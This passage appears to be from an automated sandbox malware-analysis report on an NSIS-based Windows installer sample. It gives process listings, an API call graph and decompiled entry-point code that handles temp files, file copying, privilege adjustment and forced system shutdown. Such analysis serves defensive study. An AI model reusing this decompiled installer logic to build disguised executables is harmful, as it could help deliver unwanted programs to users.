                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:49
                          Start time:01:42:40
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:50
                          Start time:01:42:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dwm.exe
                          Wow64 process (32bit):false
                          Commandline:dwm.exe
                          Imagebase:0x7ff7aa950000
                          File size:62464 bytes
                          MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language


                            Execution Graph

                            Execution Coverage:13.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:16.6%
                            Total number of Nodes:1340
                            Total number of Limit Nodes:17
                            execution_graph: node and edge listing of the interactive call graph (function addresses with their Win32 API calls and edge counts) not reproduced here
3102 405dcd 3101->3102 3103 406889 FindClose 3101->3103 3102->3066 3104 405e0c lstrlenW CharPrevW 3102->3104 3103->3102 3105 405dd7 3104->3105 3106 405e28 lstrcatW 3104->3106 3105->3051 3106->3105 3107->3070 3109 405c0d 3108->3109 3110 40601a SetFileAttributesW 3108->3110 3109->3092 3109->3093 3109->3094 3110->3109 3112 4061b3 3111->3112 3113 4061d9 GetShortPathNameW 3111->3113 3138 40602d GetFileAttributesW CreateFileW 3112->3138 3114 4062f8 3113->3114 3115 4061ee 3113->3115 3114->3098 3115->3114 3118 4061f6 wsprintfA 3115->3118 3117 4061bd CloseHandle GetShortPathNameW 3117->3114 3119 4061d1 3117->3119 3120 40657a 17 API calls 3118->3120 3119->3113 3119->3114 3121 40621e 3120->3121 3139 40602d GetFileAttributesW CreateFileW 3121->3139 3123 40622b 3123->3114 3124 40623a GetFileSize GlobalAlloc 3123->3124 3125 4062f1 CloseHandle 3124->3125 3126 40625c 3124->3126 3125->3114 3140 4060b0 ReadFile 3126->3140 3131 40627b lstrcpyA 3134 40629d 3131->3134 3132 40628f 3133 405f92 4 API calls 3132->3133 3133->3134 3135 4062d4 SetFilePointer 3134->3135 3147 4060df WriteFile 3135->3147 3138->3117 3139->3123 3141 4060ce 3140->3141 3141->3125 3142 405f92 lstrlenA 3141->3142 3143 405fd3 lstrlenA 3142->3143 3144 405fdb 3143->3144 3145 405fac lstrcmpiA 3143->3145 3144->3131 3144->3132 3145->3144 3146 405fca CharNextA 3145->3146 3146->3143 3148 4060fd GlobalFree 3147->3148 3148->3125 4146 401f12 4147 402da6 17 API calls 4146->4147 4148 401f18 4147->4148 4149 402da6 17 API calls 4148->4149 4150 401f21 4149->4150 4151 402da6 17 API calls 4150->4151 4152 401f2a 4151->4152 4153 402da6 17 API calls 4152->4153 4154 401f33 4153->4154 4155 401423 24 API calls 4154->4155 4156 401f3a 4155->4156 4163 405b63 ShellExecuteExW 4156->4163 4158 401f82 4159 40292e 4158->4159 4160 4069b5 5 API calls 4158->4160 4161 401f9f CloseHandle 4160->4161 4161->4159 4163->4158 4164 405513 4165 405523 4164->4165 4166 405537 4164->4166 4167 405580 4165->4167 4168 405529 4165->4168 4169 40553f IsWindowVisible 
4166->4169 4175 405556 4166->4175 4170 405585 CallWindowProcW 4167->4170 4171 4044e5 SendMessageW 4168->4171 4169->4167 4172 40554c 4169->4172 4173 405533 4170->4173 4171->4173 4174 404e54 5 API calls 4172->4174 4174->4175 4175->4170 4176 404ed4 4 API calls 4175->4176 4176->4167 4177 402f93 4178 402fa5 SetTimer 4177->4178 4179 402fbe 4177->4179 4178->4179 4180 403013 4179->4180 4181 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4179->4181 4181->4180 4182 401d17 4183 402d84 17 API calls 4182->4183 4184 401d1d IsWindow 4183->4184 4185 401a20 4184->4185 4186 403f9a 4187 403fb2 4186->4187 4188 404113 4186->4188 4187->4188 4189 403fbe 4187->4189 4190 404164 4188->4190 4191 404124 GetDlgItem GetDlgItem 4188->4191 4192 403fc9 SetWindowPos 4189->4192 4193 403fdc 4189->4193 4195 4041be 4190->4195 4206 401389 2 API calls 4190->4206 4194 404499 18 API calls 4191->4194 4192->4193 4197 403fe5 ShowWindow 4193->4197 4198 404027 4193->4198 4199 40414e SetClassLongW 4194->4199 4196 4044e5 SendMessageW 4195->4196 4200 40410e 4195->4200 4228 4041d0 4196->4228 4201 4040d1 4197->4201 4202 404005 GetWindowLongW 4197->4202 4203 404046 4198->4203 4204 40402f DestroyWindow 4198->4204 4205 40140b 2 API calls 4199->4205 4207 404500 8 API calls 4201->4207 4202->4201 4208 40401e ShowWindow 4202->4208 4210 40404b SetWindowLongW 4203->4210 4211 40405c 4203->4211 4209 404422 4204->4209 4205->4190 4212 404196 4206->4212 4207->4200 4208->4198 4209->4200 4217 404453 ShowWindow 4209->4217 4210->4200 4211->4201 4215 404068 GetDlgItem 4211->4215 4212->4195 4216 40419a SendMessageW 4212->4216 4213 40140b 2 API calls 4213->4228 4214 404424 DestroyWindow EndDialog 4214->4209 4218 404096 4215->4218 4219 404079 SendMessageW IsWindowEnabled 4215->4219 4216->4200 4217->4200 4221 4040a3 4218->4221 4222 4040ea SendMessageW 4218->4222 4223 4040b6 4218->4223 4231 40409b 4218->4231 4219->4200 4219->4218 4220 40657a 17 API calls 4220->4228 4221->4222 4221->4231 4222->4201 4226 4040d3 4223->4226 4227 4040be 
4223->4227 4224 404472 SendMessageW 4224->4201 4225 404499 18 API calls 4225->4228 4230 40140b 2 API calls 4226->4230 4229 40140b 2 API calls 4227->4229 4228->4200 4228->4213 4228->4214 4228->4220 4228->4225 4232 404499 18 API calls 4228->4232 4248 404364 DestroyWindow 4228->4248 4229->4231 4230->4231 4231->4201 4231->4224 4233 40424b GetDlgItem 4232->4233 4234 404260 4233->4234 4235 404268 ShowWindow EnableWindow 4233->4235 4234->4235 4257 4044bb EnableWindow 4235->4257 4237 404292 EnableWindow 4242 4042a6 4237->4242 4238 4042ab GetSystemMenu EnableMenuItem SendMessageW 4239 4042db SendMessageW 4238->4239 4238->4242 4239->4242 4241 403f7b 18 API calls 4241->4242 4242->4238 4242->4241 4258 4044ce SendMessageW 4242->4258 4259 40653d lstrcpynW 4242->4259 4244 40430a lstrlenW 4245 40657a 17 API calls 4244->4245 4246 404320 SetWindowTextW 4245->4246 4247 401389 2 API calls 4246->4247 4247->4228 4248->4209 4249 40437e CreateDialogParamW 4248->4249 4249->4209 4250 4043b1 4249->4250 4251 404499 18 API calls 4250->4251 4252 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4251->4252 4253 401389 2 API calls 4252->4253 4254 404402 4253->4254 4254->4200 4255 40440a ShowWindow 4254->4255 4256 4044e5 SendMessageW 4255->4256 4256->4209 4257->4237 4258->4242 4259->4244 4260 401b9b 4261 401ba8 4260->4261 4262 401bec 4260->4262 4265 401c31 4261->4265 4270 401bbf 4261->4270 4263 401bf1 4262->4263 4264 401c16 GlobalAlloc 4262->4264 4276 40239d 4263->4276 4281 40653d lstrcpynW 4263->4281 4267 40657a 17 API calls 4264->4267 4266 40657a 17 API calls 4265->4266 4265->4276 4268 402397 4266->4268 4267->4265 4273 405b9d MessageBoxIndirectW 4268->4273 4279 40653d lstrcpynW 4270->4279 4271 401c03 GlobalFree 4271->4276 4273->4276 4274 401bce 4280 40653d lstrcpynW 4274->4280 4277 401bdd 4282 40653d lstrcpynW 4277->4282 4279->4274 4280->4277 4281->4271 4282->4276 4283 40261c 4284 402da6 17 API calls 4283->4284 4285 402623 4284->4285 4288 40602d GetFileAttributesW CreateFileW 
4285->4288 4287 40262f 4288->4287 4289 40149e 4290 4014ac PostQuitMessage 4289->4290 4291 40239d 4289->4291 4290->4291 4292 40259e 4302 402de6 4292->4302 4295 402d84 17 API calls 4296 4025b1 4295->4296 4297 40292e 4296->4297 4298 4025d9 RegEnumValueW 4296->4298 4299 4025cd RegEnumKeyW 4296->4299 4300 4025ee RegCloseKey 4298->4300 4299->4300 4300->4297 4303 402da6 17 API calls 4302->4303 4304 402dfd 4303->4304 4305 4063aa RegOpenKeyExW 4304->4305 4306 4025a8 4305->4306 4306->4295 4307 4015a3 4308 402da6 17 API calls 4307->4308 4309 4015aa SetFileAttributesW 4308->4309 4310 4015bc 4309->4310 3149 401fa4 3150 402da6 17 API calls 3149->3150 3151 401faa 3150->3151 3152 40559f 24 API calls 3151->3152 3153 401fb4 3152->3153 3164 405b20 CreateProcessW 3153->3164 3156 401fdd CloseHandle 3159 40292e 3156->3159 3160 401fcf 3161 401fd4 3160->3161 3162 401fdf 3160->3162 3172 406484 wsprintfW 3161->3172 3162->3156 3165 405b53 CloseHandle 3164->3165 3166 401fba 3164->3166 3165->3166 3166->3156 3166->3159 3167 4069b5 WaitForSingleObject 3166->3167 3168 4069cf 3167->3168 3169 4069e1 GetExitCodeProcess 3168->3169 3173 406946 3168->3173 3169->3160 3172->3156 3174 406963 PeekMessageW 3173->3174 3175 406973 WaitForSingleObject 3174->3175 3176 406959 DispatchMessageW 3174->3176 3175->3168 3176->3174 4311 40202a 4312 402da6 17 API calls 4311->4312 4313 402031 4312->4313 4314 40690a 5 API calls 4313->4314 4315 402040 4314->4315 4316 40205c GlobalAlloc 4315->4316 4325 4020cc 4315->4325 4317 402070 4316->4317 4316->4325 4318 40690a 5 API calls 4317->4318 4319 402077 4318->4319 4320 40690a 5 API calls 4319->4320 4321 402081 4320->4321 4321->4325 4326 406484 wsprintfW 4321->4326 4323 4020ba 4327 406484 wsprintfW 4323->4327 4326->4323 4327->4325 4328 40252a 4329 402de6 17 API calls 4328->4329 4330 402534 4329->4330 4331 402da6 17 API calls 4330->4331 4332 40253d 4331->4332 4333 402548 RegQueryValueExW 4332->4333 4334 40292e 4332->4334 4335 402568 4333->4335 4338 40256e RegCloseKey 4333->4338 
4335->4338 4339 406484 wsprintfW 4335->4339 4338->4334 4339->4338 4340 4021aa 4341 402da6 17 API calls 4340->4341 4342 4021b1 4341->4342 4343 402da6 17 API calls 4342->4343 4344 4021bb 4343->4344 4345 402da6 17 API calls 4344->4345 4346 4021c5 4345->4346 4347 402da6 17 API calls 4346->4347 4348 4021cf 4347->4348 4349 402da6 17 API calls 4348->4349 4350 4021d9 4349->4350 4351 402218 CoCreateInstance 4350->4351 4352 402da6 17 API calls 4350->4352 4355 402237 4351->4355 4352->4351 4353 401423 24 API calls 4354 4022f6 4353->4354 4355->4353 4355->4354 4356 403baa 4357 403bb5 4356->4357 4358 403bbc GlobalAlloc 4357->4358 4359 403bb9 4357->4359 4358->4359 3181 40352d SetErrorMode GetVersionExW 3182 4035b7 3181->3182 3183 40357f GetVersionExW 3181->3183 3184 403610 3182->3184 3185 40690a 5 API calls 3182->3185 3183->3182 3186 40689a 3 API calls 3184->3186 3185->3184 3187 403626 lstrlenA 3186->3187 3187->3184 3188 403636 3187->3188 3189 40690a 5 API calls 3188->3189 3190 40363d 3189->3190 3191 40690a 5 API calls 3190->3191 3192 403644 3191->3192 3193 40690a 5 API calls 3192->3193 3197 403650 #17 OleInitialize SHGetFileInfoW 3193->3197 3196 40369d GetCommandLineW 3272 40653d lstrcpynW 3196->3272 3271 40653d lstrcpynW 3197->3271 3199 4036af 3200 405e39 CharNextW 3199->3200 3201 4036d5 CharNextW 3200->3201 3213 4036e6 3201->3213 3202 4037e4 3203 4037f8 GetTempPathW 3202->3203 3273 4034fc 3203->3273 3205 403810 3207 403814 GetWindowsDirectoryW lstrcatW 3205->3207 3208 40386a DeleteFileW 3205->3208 3206 405e39 CharNextW 3206->3213 3209 4034fc 12 API calls 3207->3209 3283 40307d GetTickCount GetModuleFileNameW 3208->3283 3211 403830 3209->3211 3211->3208 3214 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3211->3214 3212 40387d 3216 403a59 ExitProcess OleUninitialize 3212->3216 3218 403932 3212->3218 3226 405e39 CharNextW 3212->3226 3213->3202 3213->3206 3215 4037e6 3213->3215 3217 4034fc 12 API calls 3214->3217 3368 40653d lstrcpynW 3215->3368 3220 
403a69 3216->3220 3221 403a7e 3216->3221 3225 403862 3217->3225 3311 403bec 3218->3311 3373 405b9d 3220->3373 3223 403a86 GetCurrentProcess OpenProcessToken 3221->3223 3224 403afc ExitProcess 3221->3224 3229 403acc 3223->3229 3230 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3223->3230 3225->3208 3225->3216 3240 40389f 3226->3240 3233 40690a 5 API calls 3229->3233 3230->3229 3231 403941 3231->3216 3236 403ad3 3233->3236 3234 403908 3237 405f14 18 API calls 3234->3237 3235 403949 3239 405b08 5 API calls 3235->3239 3238 403ae8 ExitWindowsEx 3236->3238 3242 403af5 3236->3242 3241 403914 3237->3241 3238->3224 3238->3242 3243 40394e lstrcatW 3239->3243 3240->3234 3240->3235 3241->3216 3369 40653d lstrcpynW 3241->3369 3377 40140b 3242->3377 3244 40396a lstrcatW lstrcmpiW 3243->3244 3245 40395f lstrcatW 3243->3245 3244->3231 3247 40398a 3244->3247 3245->3244 3249 403996 3247->3249 3250 40398f 3247->3250 3253 405aeb 2 API calls 3249->3253 3252 405a6e 4 API calls 3250->3252 3251 403927 3370 40653d lstrcpynW 3251->3370 3255 403994 3252->3255 3256 40399b SetCurrentDirectoryW 3253->3256 3255->3256 3257 4039b8 3256->3257 3258 4039ad 3256->3258 3372 40653d lstrcpynW 3257->3372 3371 40653d lstrcpynW 3258->3371 3261 40657a 17 API calls 3262 4039fa DeleteFileW 3261->3262 3263 403a06 CopyFileW 3262->3263 3268 4039c5 3262->3268 3263->3268 3264 403a50 3266 4062fd 36 API calls 3264->3266 3265 4062fd 36 API calls 3265->3268 3266->3231 3267 40657a 17 API calls 3267->3268 3268->3261 3268->3264 3268->3265 3268->3267 3269 405b20 2 API calls 3268->3269 3270 403a3a CloseHandle 3268->3270 3269->3268 3270->3268 3271->3196 3272->3199 3274 4067c4 5 API calls 3273->3274 3276 403508 3274->3276 3275 403512 3275->3205 3276->3275 3277 405e0c 3 API calls 3276->3277 3278 40351a 3277->3278 3279 405aeb 2 API calls 3278->3279 3280 403520 3279->3280 3380 40605c 3280->3380 3384 40602d GetFileAttributesW CreateFileW 3283->3384 3285 4030bd 3303 4030cd 3285->3303 3385 40653d lstrcpynW 3285->3385 3287 
4030e3 3288 405e58 2 API calls 3287->3288 3289 4030e9 3288->3289 3386 40653d lstrcpynW 3289->3386 3291 4030f4 GetFileSize 3292 4031ee 3291->3292 3310 40310b 3291->3310 3387 403019 3292->3387 3294 4031f7 3296 403227 GlobalAlloc 3294->3296 3294->3303 3422 4034e5 SetFilePointer 3294->3422 3398 4034e5 SetFilePointer 3296->3398 3298 40325a 3300 403019 6 API calls 3298->3300 3300->3303 3301 403210 3304 4034cf ReadFile 3301->3304 3302 403242 3399 4032b4 3302->3399 3303->3212 3306 40321b 3304->3306 3306->3296 3306->3303 3307 403019 6 API calls 3307->3310 3308 40324e 3308->3303 3308->3308 3309 40328b SetFilePointer 3308->3309 3309->3303 3310->3292 3310->3298 3310->3303 3310->3307 3419 4034cf 3310->3419 3312 40690a 5 API calls 3311->3312 3313 403c00 3312->3313 3314 403c06 GetUserDefaultUILanguage 3313->3314 3315 403c18 3313->3315 3424 406484 wsprintfW 3314->3424 3317 40640b 3 API calls 3315->3317 3318 403c48 3317->3318 3320 403c67 lstrcatW 3318->3320 3321 40640b 3 API calls 3318->3321 3319 403c16 3425 403ec2 3319->3425 3320->3319 3321->3320 3324 405f14 18 API calls 3325 403c99 3324->3325 3326 403d2d 3325->3326 3328 40640b 3 API calls 3325->3328 3327 405f14 18 API calls 3326->3327 3329 403d33 3327->3329 3330 403ccb 3328->3330 3331 403d43 LoadImageW 3329->3331 3334 40657a 17 API calls 3329->3334 3330->3326 3338 403cec lstrlenW 3330->3338 3342 405e39 CharNextW 3330->3342 3332 403de9 3331->3332 3333 403d6a RegisterClassW 3331->3333 3337 40140b 2 API calls 3332->3337 3335 403da0 SystemParametersInfoW CreateWindowExW 3333->3335 3336 403df3 3333->3336 3334->3331 3335->3332 3336->3231 3341 403def 3337->3341 3339 403d20 3338->3339 3340 403cfa lstrcmpiW 3338->3340 3345 405e0c 3 API calls 3339->3345 3340->3339 3344 403d0a GetFileAttributesW 3340->3344 3341->3336 3347 403ec2 18 API calls 3341->3347 3343 403ce9 3342->3343 3343->3338 3346 403d16 3344->3346 3348 403d26 3345->3348 3346->3339 3349 405e58 2 API calls 3346->3349 3350 403e00 3347->3350 3433 40653d lstrcpynW 3348->3433 
3349->3339 3352 403e0c ShowWindow 3350->3352 3353 403e8f 3350->3353 3355 40689a 3 API calls 3352->3355 3434 405672 OleInitialize 3353->3434 3357 403e24 3355->3357 3356 403e95 3358 403eb1 3356->3358 3359 403e99 3356->3359 3360 403e32 GetClassInfoW 3357->3360 3364 40689a 3 API calls 3357->3364 3363 40140b 2 API calls 3358->3363 3359->3336 3366 40140b 2 API calls 3359->3366 3361 403e46 GetClassInfoW RegisterClassW 3360->3361 3362 403e5c DialogBoxParamW 3360->3362 3361->3362 3365 40140b 2 API calls 3362->3365 3363->3336 3364->3360 3367 403e84 3365->3367 3366->3336 3367->3336 3368->3203 3369->3251 3370->3218 3371->3257 3372->3268 3374 405bb2 3373->3374 3375 405bc6 MessageBoxIndirectW 3374->3375 3376 403a76 ExitProcess 3374->3376 3375->3376 3378 401389 2 API calls 3377->3378 3379 401420 3378->3379 3379->3224 3381 406069 GetTickCount GetTempFileNameW 3380->3381 3382 40352b 3381->3382 3383 40609f 3381->3383 3382->3205 3383->3381 3383->3382 3384->3285 3385->3287 3386->3291 3388 403022 3387->3388 3389 40303a 3387->3389 3390 403032 3388->3390 3391 40302b DestroyWindow 3388->3391 3392 403042 3389->3392 3393 40304a GetTickCount 3389->3393 3390->3294 3391->3390 3394 406946 2 API calls 3392->3394 3395 403058 CreateDialogParamW ShowWindow 3393->3395 3396 40307b 3393->3396 3397 403048 3394->3397 3395->3396 3396->3294 3397->3294 3398->3302 3400 4032cd 3399->3400 3401 4032fb 3400->3401 3423 4034e5 SetFilePointer 3400->3423 3403 4034cf ReadFile 3401->3403 3404 403306 3403->3404 3405 403468 3404->3405 3406 403318 GetTickCount 3404->3406 3413 403452 3404->3413 3407 4034aa 3405->3407 3411 40346c 3405->3411 3406->3413 3417 403367 3406->3417 3408 4034cf ReadFile 3407->3408 3408->3413 3409 4034cf ReadFile 3409->3417 3410 4034cf ReadFile 3410->3411 3411->3410 3412 4060df WriteFile 3411->3412 3411->3413 3412->3411 3413->3308 3414 4033bd GetTickCount 3414->3417 3415 4033e2 MulDiv wsprintfW 3416 40559f 24 API calls 3415->3416 3416->3417 3417->3409 3417->3413 3417->3414 3417->3415 3418 4060df 
WriteFile 3417->3418 3418->3417 3420 4060b0 ReadFile 3419->3420 3421 4034e2 3420->3421 3421->3310 3422->3301 3423->3401 3424->3319 3426 403ed6 3425->3426 3441 406484 wsprintfW 3426->3441 3428 403f47 3442 403f7b 3428->3442 3430 403c77 3430->3324 3431 403f4c 3431->3430 3432 40657a 17 API calls 3431->3432 3432->3431 3433->3326 3445 4044e5 3434->3445 3436 4056bc 3437 4044e5 SendMessageW 3436->3437 3439 4056ce OleUninitialize 3437->3439 3438 405695 3438->3436 3448 401389 3438->3448 3439->3356 3441->3428 3443 40657a 17 API calls 3442->3443 3444 403f89 SetWindowTextW 3443->3444 3444->3431 3446 4044fd 3445->3446 3447 4044ee SendMessageW 3445->3447 3446->3438 3447->3446 3450 401390 3448->3450 3449 4013fe 3449->3438 3450->3449 3451 4013cb MulDiv SendMessageW 3450->3451 3451->3450 4360 401a30 4361 402da6 17 API calls 4360->4361 4362 401a39 ExpandEnvironmentStringsW 4361->4362 4363 401a4d 4362->4363 4365 401a60 4362->4365 4364 401a52 lstrcmpW 4363->4364 4363->4365 4364->4365 4371 4023b2 4372 4023c0 4371->4372 4373 4023ba 4371->4373 4375 402da6 17 API calls 4372->4375 4376 4023ce 4372->4376 4374 402da6 17 API calls 4373->4374 4374->4372 4375->4376 4377 4023dc 4376->4377 4378 402da6 17 API calls 4376->4378 4379 402da6 17 API calls 4377->4379 4378->4377 4380 4023e5 WritePrivateProfileStringW 4379->4380 4381 402434 4382 402467 4381->4382 4383 40243c 4381->4383 4384 402da6 17 API calls 4382->4384 4385 402de6 17 API calls 4383->4385 4386 40246e 4384->4386 4387 402443 4385->4387 4392 402e64 4386->4392 4389 402da6 17 API calls 4387->4389 4391 40247b 4387->4391 4390 402454 RegDeleteValueW RegCloseKey 4389->4390 4390->4391 4393 402e71 4392->4393 4394 402e78 4392->4394 4393->4391 4394->4393 4396 402ea9 4394->4396 4397 4063aa RegOpenKeyExW 4396->4397 4398 402ed7 4397->4398 4399 402ee7 RegEnumValueW 4398->4399 4406 402f0a 4398->4406 4407 402f81 4398->4407 4401 402f71 RegCloseKey 4399->4401 4399->4406 4400 402f46 RegEnumKeyW 4402 402f4f RegCloseKey 4400->4402 4400->4406 4401->4407 4403 
40690a 5 API calls 4402->4403 4405 402f5f 4403->4405 4404 402ea9 6 API calls 4404->4406 4405->4407 4408 402f63 RegDeleteKeyW 4405->4408 4406->4400 4406->4401 4406->4402 4406->4404 4407->4393 4408->4407 4409 401735 4410 402da6 17 API calls 4409->4410 4411 40173c SearchPathW 4410->4411 4412 401757 4411->4412 4413 401d38 4414 402d84 17 API calls 4413->4414 4415 401d3f 4414->4415 4416 402d84 17 API calls 4415->4416 4417 401d4b GetDlgItem 4416->4417 4418 402638 4417->4418 4419 4014b8 4420 4014be 4419->4420 4421 401389 2 API calls 4420->4421 4422 4014c6 4421->4422 4423 40263e 4424 402652 4423->4424 4425 40266d 4423->4425 4426 402d84 17 API calls 4424->4426 4427 402672 4425->4427 4428 40269d 4425->4428 4435 402659 4426->4435 4429 402da6 17 API calls 4427->4429 4430 402da6 17 API calls 4428->4430 4432 402679 4429->4432 4431 4026a4 lstrlenW 4430->4431 4431->4435 4440 40655f WideCharToMultiByte 4432->4440 4434 40268d lstrlenA 4434->4435 4436 4026d1 4435->4436 4437 4026e7 4435->4437 4439 40610e 5 API calls 4435->4439 4436->4437 4438 4060df WriteFile 4436->4438 4438->4437 4439->4436 4440->4434

                            Control-flow Graph
                            [Control-flow graph of _entry_ (basic blocks from 0x40352d to 0x403b0c, numbered 0-140, each annotated with the APIs it calls: SetErrorMode, GetVersionExW, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, DeleteFileW, CopyFileW, SetCurrentDirectoryW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess). Blocks are colour-coded Executed / Not Executed in the original rendering; the block edge list is not meaningful as text and is omitted here.]
                            C-Code - Quality: 78%
                            			_entry_() {
                            				WCHAR* _v8;
                            				signed int _v12;
                            				void* _v16;
                            				signed int _v20;
                            				int _v24;
                            				int _v28;
                            				struct _TOKEN_PRIVILEGES _v40;
                            				signed char _v42;
                            				int _v44;
                            				signed int _v48;
                            				intOrPtr _v278;
                            				signed short _v310;
                            				struct _OSVERSIONINFOW _v324;
                            				struct _SHFILEINFOW _v1016;
                            				intOrPtr* _t88;
                            				intOrPtr* _t94;
                            				void _t97;
                            				void* _t116;
                            				WCHAR* _t118;
                            				signed int _t119;
                            				intOrPtr* _t123;
                            				void* _t137;
                            				void* _t143;
                            				void* _t148;
                            				void* _t152;
                            				void* _t157;
                            				signed int _t167;
                            				void* _t170;
                            				void* _t175;
                            				intOrPtr _t177;
                            				intOrPtr _t178;
                            				intOrPtr* _t179;
                            				int _t188;
                            				void* _t189;
                            				void* _t198;
                            				signed int _t204;
                            				signed int _t209;
                            				signed int _t214;
                            				int* _t218;
                            				signed int _t226;
                            				signed int _t229;
                            				CHAR* _t231;
                            				signed int _t233;
                            				WCHAR* _t234;
                            
                            				0x440000 = 0x20;
                            				_t188 = 0;
                            				_v24 = 0;
                            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                            				_v20 = 0;
                            				SetErrorMode(0x8001); // executed
                            				_v324.szCSDVersion = 0;
                            				_v48 = 0;
                            				_v44 = 0;
                            				_v324.dwOSVersionInfoSize = 0x11c;
                            				if(GetVersionExW( &_v324) == 0) {
                            					_v324.dwOSVersionInfoSize = 0x114;
                            					GetVersionExW( &_v324);
                            					asm("sbb eax, eax");
                            					_v42 = 4;
                            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                            				}
                            				if(_v324.dwMajorVersion < 0xa) {
                            					_v310 = _v310 & 0x00000000;
                            				}
                            				 *0x434fb8 = _v324.dwBuildNumber;
                            				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                            				if( *0x434fbe != 0x600) {
                            					_t179 = E0040690A(_t188);
                            					if(_t179 != _t188) {
                            						 *_t179(0xc00);
                            					}
                            				}
                            				_t231 = "UXTHEME";
                            				do {
                            					E0040689A(_t231); // executed
                            					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                            				} while ( *_t231 != 0);
                            				E0040690A(0xb);
                            				 *0x434f04 = E0040690A(9);
                            				_t88 = E0040690A(7);
                            				if(_t88 != _t188) {
                            					_t88 =  *_t88(0x1e);
                            					if(_t88 != 0) {
                            						 *0x434fbc =  *0x434fbc | 0x00000080;
                            					}
                            				}
                            				__imp__#17();
                            				__imp__OleInitialize(_t188); // executed
                            				 *0x434fc0 = _t88;
                            				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
                            				E0040653D(0x433f00, L"NSIS Error");
                            				E0040653D(0x440000, GetCommandLineW());
                            				_t94 = 0x440000;
                            				_t233 = 0x22;
                            				 *0x434f00 = 0x400000;
                            				if( *0x440000 == _t233) {
                            					_t94 = 0x440002;
                            				}
                            				_t198 = CharNextW(E00405E39(_t94, 0x440000));
                            				_v16 = _t198;
                            				while(1) {
                            					_t97 =  *_t198;
                            					_t251 = _t97 - _t188;
                            					if(_t97 == _t188) {
                            						break;
                            					}
                            					_t209 = 0x20;
                            					__eflags = _t97 - _t209;
                            					if(_t97 != _t209) {
                            						L17:
                            						__eflags =  *_t198 - _t233;
                            						_v12 = _t209;
                            						if( *_t198 == _t233) {
                            							_v12 = _t233;
                            							_t198 = _t198 + 2;
                            							__eflags = _t198;
                            						}
                            						__eflags =  *_t198 - 0x2f;
                            						if( *_t198 != 0x2f) {
                            							L32:
                            							_t198 = E00405E39(_t198, _v12);
                            							__eflags =  *_t198 - _t233;
                            							if(__eflags == 0) {
                            								_t198 = _t198 + 2;
                            								__eflags = _t198;
                            							}
                            							continue;
                            						} else {
                            							_t198 = _t198 + 2;
                            							__eflags =  *_t198 - 0x53;
                            							if( *_t198 != 0x53) {
                            								L24:
                            								asm("cdq");
                            								asm("cdq");
                            								_t214 = L"NCRC" & 0x0000ffff;
                            								asm("cdq");
                            								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
                            								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
                            								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
                            									L29:
                            									asm("cdq");
                            									asm("cdq");
                            									_t209 = L" /D=" & 0x0000ffff;
                            									asm("cdq");
                            									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
                            									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
                            									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
                            										L31:
                            										_t233 = 0x22;
                            										goto L32;
                            									}
                            									__eflags =  *_t198 - _t229;
                            									if( *_t198 == _t229) {
                            										 *(_t198 - 4) = _t188;
                            										__eflags = _t198;
                            										E0040653D(0x440800, _t198);
                            										L37:
                            										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                            										GetTempPathW(0x400, _t234);
                            										_t116 = E004034FC(_t198, _t251);
                            										_t252 = _t116;
                            										if(_t116 != 0) {
                            											L40:
                            											DeleteFileW(L"1033"); // executed
                            											_t118 = E0040307D(_t254, _v20); // executed
                            											_v8 = _t118;
                            											if(_t118 != _t188) {
                            												L68:
                            												ExitProcess(); // executed
                            												__imp__OleUninitialize(); // executed
                            												if(_v8 == _t188) {
                            													if( *0x434f94 == _t188) {
                            														L77:
                            														_t119 =  *0x434fac;
                            														if(_t119 != 0xffffffff) {
                            															_v24 = _t119;
                            														}
                            														ExitProcess(_v24);
                            													}
                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                            														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                            														_v40.PrivilegeCount = 1;
                            														_v28 = 2;
                            														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                            													}
                            													_t123 = E0040690A(4);
                            													if(_t123 == _t188) {
                            														L75:
                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                            															goto L77;
                            														}
                            														goto L76;
                            													} else {
                            														_push(0x80040002);
                            														_push(0x25);
                            														_push(_t188);
                            														_push(_t188);
                            														_push(_t188);
                            														if( *_t123() == 0) {
                            															L76:
                            															E0040140B(9);
                            															goto L77;
                            														}
                            														goto L75;
                            													}
                            												}
